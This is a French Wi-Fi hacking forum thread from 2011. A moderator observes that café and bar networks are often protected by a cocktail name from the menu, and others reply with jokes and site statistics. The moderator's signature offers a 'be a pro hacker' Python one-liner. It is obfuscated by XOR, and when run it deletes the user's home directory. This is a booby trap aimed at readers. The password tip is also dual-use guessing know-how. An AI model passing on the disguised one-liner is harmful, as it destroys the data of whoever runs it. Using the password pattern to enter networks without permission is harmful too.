Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-01-2011 23:44:53

spawn
Modérateur

Psychologie du mot de passe : les bars-cafés.

Bonsoir à tous.

Non pas que je sois alcoolique, ni que je cherche à pénétrer les réseaux des cafés.
Loin de là.
C'est un constat, une petite pierre apportée au chantier de la psychologie du mot de passe.

En effet, ayant une petite expérience des réseaux de bars, j'ai constaté que ceux-ci étaient protégés dans 15 cas sur 17 par un mot de passe faisant partie de la carte.

"sexonthebeach" en tête, avec 3 apparitions sur les 15.
N'oublions pas les majuscules, les underscores et tirets pour les noms composés.

Ainsi, si un café vous demande de vérifier-améliorer la sécurité de son réseau wifi, dites-lui d'éviter les cocktails de la carte.

Spawn.

ps: j'ai écrit "bonsoir". A titre purement informatif, avez vous la plage horaire moyenne de connexion à votre site, messieurs (mesdames) les admins ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-01-2011 00:19:09

antares145
Membre d'honneur
Site Web

Re : Psychologie du mot de passe : les bars-cafés.

Salut spawn, bienvenue sur le forum smile

Merci pour l'astuce, maintenant on comprendra mieux pourquoi certains individus à l'air louche recopient frénétiquement la carte des cocktails sur leur netbook lol
Perso d'après ce que je vois, la majorité des cafés que je connais sont soit en OPN soit en WEP, et le peu qui sont en WPA indiquent le mot de passe à la fin de la carte pour que les clients puissent se connecter donc bon big_smile

spawn a écrit :

ps: j'ai écrit "bonsoir". A titre purement informatif, avez vous la plage horaire moyenne de connexion à votre site, messieurs (mesdames) les admins ?

Plage horaire de connexion non, mais voilà les statistiques actuelles sur les heures où les gens postent des messages si tu veux :

statistics.png

Après, dis-toi bien que la majorité des membres est en France, mais on a aussi quelques québécois et quelques expatriés qui se connectent, eux n'ont pas le même horaire wink

#3 15-01-2011 18:40:50

Ratatoskr
Membre

Re : Psychologie du mot de passe : les bars-cafés.

Faudrait voir si y'a pas déjà une liste dans le genre présente dans les liens, je me souviens d'un site qui avait plein de dicos thématiques bien foutus, mais pas forcément adaptés à la France, oui. Même si j'ai du mal à imaginer le resto dont la clé WPA serait "b03ufb0urg1gn0n", ça me ferait bien rire big_smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]